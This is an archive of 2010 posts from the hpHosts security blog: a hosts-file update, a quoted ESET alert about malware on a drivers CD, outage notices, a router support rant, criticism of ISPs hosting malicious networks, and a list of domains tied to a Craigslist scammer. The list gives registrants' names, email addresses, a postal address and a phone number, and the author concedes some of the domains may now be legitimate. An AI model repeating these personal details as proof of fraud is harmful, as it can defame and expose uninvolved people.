The hpHOSTS Hosts file has been updated. There is now a total of 121,497 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 17/02/2010 05:00
  2. Last Verified: 16/02/2010 23:00

Download hpHosts now!
http://hosts-file.net/?s=Download

Alert: Infected Drivers CD?

Here's some news from the ESET Virus Lab in Slovakia. One of our clients encountered an interesting infection within his network.

The problem seemed to originate from the drivers CD that comes with the device he bought, the Habey BIS-6550HD, a fanless Atom-powered system, though we haven't seen the CD itself. Our analysis of the CD image supplied by the customer, which seems to date from July 2009, confirmed that it contains a set of files infected by 2 different viruses:
  1. Win32/Viking.CH
  2. Win32/Xorer.NAJ
Altogether, 25 executables were infected. Furthermore, 15 HTM files were infected (detected by us Win32/Xorer.AW) by the insertion of an IFRAME redirect, originating with infection by the Xorer virus. .

Both of these infiltrations are prepending viruses. Win32/Xorer is also classified as an Autorun worm. Both are described in our virus encyclopaedia, though the descriptions don't refer to the exact same variants: one describes Win32/Viking.AU and the other describes Win32/Xorer.BU.


Read more
http://www.eset.com/threat-center/blog/2010/02/16/infected-drivers-cd

Thursday, 11 February 2010

hpHosts/vURL Back online

The switch over has been made, tested and the gateway is now back online, so access to hpHosts, vURL etc, has been restored.

hpHosts/vURL 5 minute break

Just a note, due to Windows updates and a hardware replacement, the network gateway will be down for a few moments (basically to allow for the hardware to be replaced, and the Windows updates to be installed).

As an aside, when hpHosts does come back online, I re-enabled the browsing facility yesterday, and there's also both a new updates RSS feed, and a new MMT (Misleading Marketing Tactics) classification (FSA has now been split into FSA and MMT).

Sunday, 7 February 2010

Dear Netgear: Fire the script monkey please .....

I thought I'd treat myself to a router upgrade, given the current one (DG384Gv2) was struggling with the traffic on the network, and opted for the DGN2000 (would've loved a newer and better one, but this one cost £94, the rest were over £150). Configuring it for the network took a couple seconds, which was great as I needed it done asap, and switching the old to the new took miliseconds (well all you have to do is unplug a couple cables, then plug 'em into the new one).

Alas, this is where the problems started. Checking the connectivity showed external access to the internal servers worked fantastically, and external access to the likes of Google worked perfectly - but - LAN access to the servers via hostname didn't work. I double, triple and quadruple checked the configs and connections, to make sure I'd not missed anything - I hadn't.

I decided to phone Netgear to find out what the problem was, and boy did I wish I hadn't. The first bloke I spoke to asked me to check port forwarding, create a manual service to ports 443-447, and a whole world of other useless stuffage. Then finally decided to tell me "sorry, this router does not support it" (referring to the LAN access to the servers) - what utter bollocks. Advising him he was talking rubbish, I asked to speak to a supervisor, this took yet another 15-20 mins. Finally getting to talk to a manager/supervisor (and I doubt he actually was as he was just as useless), he had me go through the same rubbish again, before finally telling me yet again that the router quite simply did not support connecting to the internal servers from the LAN via their hostname (err, yeah).

I told him my DG834Gv2 worked perfectly, and all routers with port forwarding supported this, so he was talking rubbish. He put me on hold.

Whilst on hold, I decided to see if there was a firmware upgrade I could try - there was (router comes with v1.1.1). Still on hold, I upgraded the routers firmware to v1.1.8, rebooted the router and voila - everything was working perfectly.

He finally took me off hold and said the router didn't support it, and he pointed me to the "work around";

http://kb.netgear.com/app/answers/detail/a_id/8485/kw/unable%20to%20access%20my%20web%20server%20via%20host%20name/r_id/100109

Asking if he was joking, he said no (so let me get this straight, to access the internal servers via their hostname, I've got to modify my HOSTS file???? errr, yeah).

Cutting a long and boring story short, I told him he was talking absolute nonesense (didn't use those exact words but you get the drift), and how did I know that? BECAUSE I'D FIXED IT WHILST ON HOLD!!!. (he asked how and I told him, which apparently surprised him, "we weren't told that" he muttered).

To get to the point, I'd like to inform Netgear, if you're going to hire script monkeys, at least make sure those monkeys actually know what they're talking about, and aren't simply following the script!!! (scripts are great for simpleton stuff such as the ever increasing use of "have you restarted the computer" (I always laugh when I hear that), but they're useless for stuffage that actually requires knowledge!).

I'd actually looked for the firmware upgrade before calling them, but since the update notes didn't mention a fix for the problem I was experiencing, I didn't bother with it - wished I had done once I noticed it actually did fix the problem.

Friday, 5 February 2010

Crimeware friendly ISPs: COGENT /PSI (AS174)

It was a difficult choice deciding who should be in the firing line next, as far as being cybercrime friendly, as there's a multitude of choices, those I've not yet covered include VPLSNET (VPLS Inc. d/b/a Krypt Technologies), Masterhost, China (I'd be here all year with this one), Aruba (and if you're reading this Aruba - FIX YOUR DAMN ABUSE ADDRESS!), Peterhost, to name a few.

I thought I'd focus on yet another ISP that's continuing to provide connectivity to a 100% malicious ISP (root eSolutions incase you're wondering). This left me with three choices, COGENT /PSI, RUNNET or Hurricane Electric (all three have legit clients, aswell as malicious ones), I decided to opt for COGENT /PSI (AS174).

COGENT have a plethora of legit clients, amongst them, my ISP (Plusnet PLC), and to be fair, there's very little malicious activity on their own network (though there's likely alot more, I've only recorded 231 cases since July 2009), but they're continuing to provide connectivity to malicious ISP's such as Netelligent and root eSolutions et al, regardless of the fact there's been a flood of reports published on them. One has to wonder why this is, my guess is money (but I'm a skeptic).

It gets worse however, as COGENT are also one of two ISP's that are providing connectivity to the much despised Phorm (AS48214). A company that's been in the news on more than one occasion for specializing in illegal (Ref: 1, 2, 3 etc) and malicious (namely, spyware via DPI (Deep Packet Inspection) and connection hijacking) behaviour.

It is this, and this alone, that has earnt them the title of crimeware friendly. Had they not put up with this, and de-peered these "ISPs" (and I use the term ISP loosely as far as they're concerned) as soon as this started, which is what they should have done (there's certainly plenty of evidence against their clients available), I'd have went with RUNNET instead (RUNNET are also providing connectivity not only to root eSolutions, but to two other 100% malicious ISP ranges - KABELFOON (aka WorldStream)* and CARAVAN, and not forgetting of course, MASTERHOST, I'll be covering these in a later article), but alas nope.

* Just to clarify, Hurricane Electric are also providing connectivity to KABELFOON/WorldStream

To make matters worse, they've also not given Lunarpages a swift kick in the behind yet (remember them?). A kick that was deserved a very long time ago, and in my opinion, is still something they deserve (sorry guys, but your grip on security is about as good as Mr Beans, and you're about as quick at taking action on abuse/hacked sites reports, is about as quick as Google).

Something I am a little curious about however, is why COGENT /PSIs *clients* haven't forced them to take action. You'd have thought legit ISP's would want to ensure there were no connections to malicious activity, I suppose this is a question that will be left unanswered.

/update 10-02-2010 - Corrected typo

Wednesday, 3 February 2010

Happy birthday ZeusTracker!

One year ago, on the 2nd of February 2009, ZeuS Tracker was born (Introducing: abuse.ch ZeuS Tracker BETA). Today ZeuS Tracker looks back to a very successful year and I would like to use this event to write some words about ZeuS Tracker.

During the last year, ZeuS Tracker has tracked more then 2′800 malicious ZeuS C&C servers. The ZeuS Tracker has captured more then 360MB ZeuS config files and 330MB binaries.

First of all let me say that the success story of ZeuS Tracker was made possible by you. You, the readers of my blog as well as the contributors of ZeuS Tracker are the heros. Your effort, your avertising by word-of-mouth, your submission of new (unknown) ZeuS C&C servers to ZeuS Tracker, your support, this is what allowed ZeuS Tracker to gain so much attention and success. During this year, I’ve recevied hundreds of emails with constructive feedback, questions and offers by people who wanted to contribute their work. Thank you!


Read more
http://www.abuse.ch/?p=2363

Hat tip to SysAdMini for the heads up

Tuesday, 2 February 2010

hpHosts server issues

You may have noticed over the past few days, that access to the hpHosts website has been sporadic at best. I just wanted to let you all know, although annoyed as hell, I do have a good excuse, well three actually;

1. MySQL is being an absolute PITA
2. Several IP's from one of NetDirekt's ranges, has been hammering the vURL server, which accesses hpHosts (I've temporarily disabled vURL's access to hpHosts whilst I sort this out)
3. A few HostsMan users are hammering the server yet again

I'm working on sorting it out to prevent these issues.

Monday, 1 February 2010

Update: Craigslist scammers - the domains

The validation and WhoIs hunt is completed, and although I've no doubt there's more domains owned by this person than those I've found, the following are those that are or have been, owned by Melissa/Bob/Jeremy, whatever he/she wants to call him/her self.

Note: It's entirely possible that some of these are now legit, as quite a few on this list were obtained from a dated (08-30-2009) list

First, the simple validation. The following contains only those still resolving;

http://hosts-file.net/misc/hpObserver_results_-_Craigslist_scammer_domains.html

And now, complete with WhoIs information (name/e-mail only)

1910.com    >    74.117.116.65    >    74-117-116-65.parked.com        soly perlstein / solperlstein@gmail.com
1af.info    >    216.8.179.23    >    ptr-216-8-179-23.ptr.nextdimensioninc.com        Rubalier / cvx.conts@gmail.com
1af.org    >    68.178.232.100    >    parkwebwin-v01.prod.mesa1.secureserver.net        Michael Shields / michaelw33@hotmail.com
3m0.net    >    84.51.38.15    >    us.isimtescil.net        Nazim Ozkurt / mc.bakteri@hotmail.com
4r0.com    >    82.98.86.166    >    www166.sedoparking.com        Paul Fisher / pfdl01305@blueyonder.co.uk
6oe.net    >    38.117.90.45    >    Failed resolution        Whois not available at present
ajt.info    >    82.98.86.170    >    www170.sedoparking.com        Frank Becker / becker@agentur.biz
blogspammers.com    >    208.73.210.27    >    parkinglot.information.com        Admin / admin@overseedomainmanagement.com
busstations.net    >    74.117.116.120    >    74-117-116-120.parked.com        solomon perlstein / solomon@synergycr.com
cancersupport.info    >    174.120.21.253    >    fd.15.78ae.static.theplanet.com        Melissa Pechanec / justwannabeme44@gmail.com
customsportscars.net    >    64.95.64.198    >    lander.sitesense-oo.com        Rarenames    >    Inc. / brokerage@buydomains.com
degrades.net    >    216.150.214.58    >    v10.verocity.net        HugeDomains / [REMOVED]
dies.tv    >    174.120.21.252    >    fc.15.78ae.static.theplanet.com        Law, Michael / mikerlaw@gmail.com
dnposition.com    >    174.120.21.250    >    fa.15.78ae.static.theplanet.com        Bob Smith / cupamojoe@gmail.com
dnregistar.com    >    174.120.21.252    >    fc.15.78ae.static.theplanet.com        Bob Smith / cupamojoe@gmail.com
dnregistrarfinder.com    >    174.120.21.254    >    fe.15.78ae.static.theplanet.com        Bob Smith / cupamojoe@gmail.com
dnregistraronline.com    >    174.120.21.254    >    fe.15.78ae.static.theplanet.com        Bob Smith / cupamojoe@gmail.com
dnregistrarsite.com    >    174.120.21.254    >    fe.15.78ae.static.theplanet.com        Bob Smith / cupamojoe@gmail.com
dril.org    >    64.95.64.198    >    lander.sitesense-oo.com        RN WebReg / brokerage@buydomains.com
earncash-fromgrants.com    >    208.78.242.184    >    park.dynadot.com        Pending Renewal or Deletion / expired@dynadot.com
eroticgossip.com    >    64.202.189.170    >    pwfwd-v01.prod.mesa1.secureserver.net        Kevin Sinclair / kevinjsinclair@gmail.com
exhausted.info    >    82.98.86.174    >    www174.sedoparking.com        [REMOVED]
femalemodel.net    >    82.98.86.175    >    www175.sedoparking.com        Helder Luis / hl.entrepreneur@gmail.com
forexgains.info    >    174.120.189.155    >    9b.bd.78ae.static.theplanet.com        Jim Montgomery / jim.mont@gmail.com
forexlist.info    >    208.73.210.27    >    parkinglot.information.com        Registration Private / FOREXLIST.INFO@domainsbyproxy.com
freebie-haven.com    >    208.78.242.184    >    park.dynadot.com        Pending Renewal or Deletion / expired@dynadot.com
freebiesshop.com    >    216.150.214.58    >    v10.verocity.net        HugeDomains / [REMOVED]
freemaxim.com    >    208.78.242.184    >    park.dynadot.com        Pending Renewal or Deletion / expired@dynadot.com
freepokerbux.com    >    64.38.29.126    >    farm1.parklogic.com        Wendy Webbe, Ancient Holdings, LLC / ancientholdings@fastmail.fm
gjt.info    >    74.117.114.87    >    74-117-114-87.parked.com        Tim Schoon / paypal@toiletguides.com
healtharticles.info    >    74.117.116.69    >    74-117-116-69.parked.com        Donald Aquilano / bd77@inbox.com
i7j.net    >    174.120.21.254    >    fe.15.78ae.static.theplanet.com        melissa walker / justwannabeme44@gmail.com
icadets.com    >    208.73.210.27    >    parkinglot.information.com        Gina Brown / jginabrown@sbcglobal.net
idonator.com    >    174.37.172.68    >    174.37.172.68-static.reverse.softlayer.com        [REMOVED]
ilearnpoker.com    >    213.175.206.64    >    nimrod.eukhost.com        Rajendra Shah / shahagra@gmail.com
instinctsite.com    >    208.73.210.27    >    parkinglot.information.com        Admin / admin@overseedomainmanagement.com
instinctsite.net    >    208.73.210.27    >    parkinglot.information.com        Admin / admin@overseedomainmanagement.com
insurancelink.net    >    68.178.232.99    >    parkwebwin-v02.prod.mesa1.secureserver.net        Melissa Pechanec / justwannabeme44@gmail.com
j9y.com    >    82.98.86.178    >    www178.sedoparking.com        Wang Xianwei / xserver@qq.com
jaysfans.com    >    68.178.232.100    >    parkwebwin-v01.prod.mesa1.secureserver.net        THE COMPUTER GUY / yourcomputerhelp@aol.com
lustydestiny.com    >    174.120.21.253    >    fd.15.78ae.static.theplanet.com        Bob Smith c/o Dynadot Privacy / privacy@dynadot.com
manifested.info    >    216.8.179.23    >    ptr-216-8-179-23.ptr.nextdimensioninc.com        Rubalier / cvx.conts@gmail.com
masturbated.info    >    67.55.87.69    >    Failed resolution        James taylor / 2bet.com@gmail.com
mlj.info    >    74.117.114.80    >    74-117-114-80.parked.com        Tim Schoon / paypal@toiletguides.com
myexplaination.com    >    68.178.232.99    >    parkwebwin-v02.prod.mesa1.secureserver.net        Zoran Peric / dorida123@gmail.com
myexplaination.info    >    68.178.232.99    >    parkwebwin-v02.prod.mesa1.secureserver.net        Zoran Peric / dorida123@gmail.com
myexplaination.net    >    68.178.232.99    >    parkwebwin-v02.prod.mesa1.secureserver.net        Zoran Peric / dorida123@gmail.com
myexplaination.org    >    68.178.232.99    >    parkwebwin-v02.prod.mesa1.secureserver.net        Zoran Peric / dorida123@gmail.com
nakedphotos.org    >    69.46.43.2    >    server.pqhost.com. pqhost.lynnwood.netriver.net        james taylor / 2bet.com@gmail.com
nudebeauty.net    >    82.98.86.171    >    www171.sedoparking.com        Arvind Reddy / instantarvind@yahoo.com
onlineaddict.net    >    74.208.19.226    >    perfora.net        Private Registration / proxy2149687@1and1-private-registration.com
pantera.us    >    82.98.86.173    >    www173.sedoparking.com        REMOVED
perfectass.org    >    208.166.55.20    >    parkforward.dynadot.com        Bob Smith / cupamojoe@gmail.com
pertains.net    >    216.150.214.58    >    v10.verocity.net        HugeDomains / [REMOVED]
pfj.info    >    82.98.86.178    >    www178.sedoparking.com        Tim Schoon / schoont@gmail.com
pinkcamclub.com    >    174.120.21.253    >    fd.15.78ae.static.theplanet.com        Domains by Proxy Inc. / pinkcamclub.com@domainsbyproxy.com
princesshannah.info    >    208.78.242.184    >    park.dynadot.com        Pending Renewal or Deletion / expired@dynadot.com
programming.name    >    58.123.163.90    >    Failed resolution        Whois unavailable
promotes.info    >    216.8.179.23    >    ptr-216-8-179-23.ptr.nextdimensioninc.com        Rubalier / cvx.conts@gmail.com
prospectivehiring.com    >    208.78.242.184    >    park.dynadot.com        Pending Renewal or Deletion / expired@dynadot.com
ptj.info    >    82.98.86.174    >    www174.sedoparking.com        Tim Schoon / schoont@gmail.com
realamateur.org    >    72.232.167.95    >    sgrid08a.myinternetservices.com        *. ANT / antcomic@gmail.com
reloadedproxy.info    >    98.129.126.138    >    Failed resolution        Recaptured Domain / Shark@Recaptured.com
rentalcompany.org    >    74.117.116.70    >    74-117-116-70.parked.com        Jeffery Wiggers / domainnamesdaily@yahoo.com
retailbuy.com    >    174.120.31.124    >    7c.1f.78ae.static.theplanet.com        JAE YI / scanpos@sbcglobal.net
robbing.info    >    216.8.179.23    >    ptr-216-8-179-23.ptr.nextdimensioninc.com        Rubalier / cvx.conts@gmail.com
sexysinglesworld.com    >    208.78.242.184    >    park.dynadot.com        Pending Renewal or Deletion / expired@dynadot.com
sexyslut.info    >    74.117.114.74    >    74-117-114-74.parked.com        Lorena Vila / lavinvestments@hotmail.com
supernoah.info    >    208.78.242.184    >    park.dynadot.com        Pending Renewal or Deletion / expired@dynadot.com
thednsite.com    >    174.120.21.252    >    fc.15.78ae.static.theplanet.com        Bob Smith / cupamojoe@gmail.com
tobaccosmoke.info    >    68.178.232.100    >    parkwebwin-v01.prod.mesa1.secureserver.net        Melissa Walker / justwannabeme44@gmail.com
totalnag.com    >    208.87.33.151    >    151.128-191.33.87.208.in-addr.arpa. wc40-alt.medialogik.com        Above.com Domain Privacy / hostmaster@above.com
trafficmethod.com    >    68.178.232.99    >    parkwebwin-v02.prod.mesa1.secureserver.net        Melissa Pechanec / justwannabeme44@gmail.com
university-sports.com    >    209.249.222.18    >    Failed resolution        WhoisGuard / 9d3525d14c6a4d8b9c3149cfc0404878.protect@whoisguard.com
usaforums.org    >    64.95.64.198    >    lander.sitesense-oo.com        Rarenames, Inc. / brokerage@buydomains.com
yyour.com    >    72.29.70.106    >    ns4.emphost.com.br        Michael Evans / mikedoesbooks@yahoo.com


Finally, the complete list, inclusive of those no longer resolving;

0201.org
1910.com
1af.info
1af.org
20oz.org
20x30.net
360xboxstore.net
3m0.net
4r0.com
6oe.net
adultfunnow.com
affiliatesbeingrated.com
ajt.info
basicrecipes.net
blogspammers.com
boycottopec.com
busstations.net
cancersupport.info
contemned.com
customsportscars.net
degrades.net
devoted-daters.com
dies.tv
digitalcamcity.com
digitalcamcity.net
dnbizness.com
dnblocker.com
dnposition.com
dnregistar.com
dnregistrarfinder.com
dnregistraronline.com
dnregistrarsite.com
domesticbrews.info
dril.org
drilloffshore.info
earncash-fromgrants.com
eroticgossip.com
europeanrealtors.info
exhausted.info
ezfuk.com
femalemodel.net
findacure.info
findthecure.info
forexearnings.info
forexgains.info
forexgains.net
forexgains.org
forexlist.info
forextradingcompanies.info
foroufc.com
freebie-haven.com
freebiesforyou.net
freebiesshop.com
freemaxim.com
freepokerbux.com
frickit.info
funz.org
gatoyperro.com
generickeyword.net
generictraffic.net
gjt.info
googl-eadsense.com
gregzlist.org
healtharticles.info
heismancontenders.com
i7j.net
icadets.com
idonator.com
ilearnpoker.com
instinctcellphone.net
instinctsite.com
instinctsite.net
insurancelink.net
itstore.mobi
j9y.com
jaysfans.com
kickapooh.com
lustydestiny.com
manifested.info
marriedtoapornaddict.com
masturbated.info
mdmotorsportsshop.com
melschristmas.com
mlj.info
multifreebies.com
myexplaination.com
myexplaination.info
myexplaination.net
myexplaination.org
nakedbabe.org
nakedphotos.org
nationaleconomy.info
naturalgascartel.com
nudebeauty.net
obamahope.info
onlineaddict.net
p3z.net
pantera.us
perfectass.org
pertains.net
pfj.info
pinkcamclub.com
pizzadeliveries.org
poemshack.com
precognitive.net
princesshannah.info
programming.name
promotes.info
prospectivehiring.com
ptj.info
realamateur.org
reloadedproxy.info
rentalcompany.org
retailbuy.com
robbing.info
sanjosecali.com
saveu.org
sexygallery.info
sexysinglesworld.com
sexyslut.info
slume.com
somememory.net
sultrysins.com
supernoah.info
thednsite.com
theiphonedirect.com
thexbox360store.net
tightens.net
tobaccosmoke.info
totalinvestment.info
totalinvestments.info
totalnag.com
tournamentrules.com
trafficmethod.com
txrentals.info
university-sports.com
usaforums.org
vandalizedmarketing.com
vitalorgans.info
vitalstats.info
websitebuilderz.org
whif.info
yahbot.com
yjjj.info
youtubeanywhere.info
yyour.com


References:

Update: Craigslist phishing domains down
http://hphosts.blogspot.com/2010/02/update-craigslist-phishing-domains-down.html

Craigs List: Allow me to beat you over the head (softly of course)
http://hphosts.blogspot.com/2010/01/craigs-list-allow-me-to-beat-you-over.html

Update: Craigslist phishing domains down

I'm happy to report, I've just been advised by Jeremy Zawodny at Craigslist, that the following two domains have now been taken offline;

craigslistinc.org
craigslistmarketing.org

Sadly, dnblocker.com is still online, and hillariously, has tried changing the WhoIs information to "Bob Smith" in a poor attempt to hide .....

Registrant:
Bob Smith
343 Mumby Road
Gosport, Hampshire PO12 1AQ
United Kingdom

Administrative Contact:
Bob Smith
343 Mumby Road
Gosport, Hampshire PO12 1AQ
United Kingdom
cupamojo@gmail.com
+1 2064265824


Doesn't really work now, does it ....

The e-mail address now associated with dnblocker, is apparently associated with 3 other domains. I'm working on getting the list, but in the meantime;

craigslistadverification.com (registered, no website)
dnregistraronline.com (hosted at 174.120.21.254)
dnregistrarsite.com (hosted at 174.120.21.254)
dnregistrarfinder.com (hosted at 174.120.21.254)
affiliatesbeingrated.com (hosted at 174.120.21.252)

I've got a whole list of other domains known to be or have been, owned by this person, and will publish the results once complete.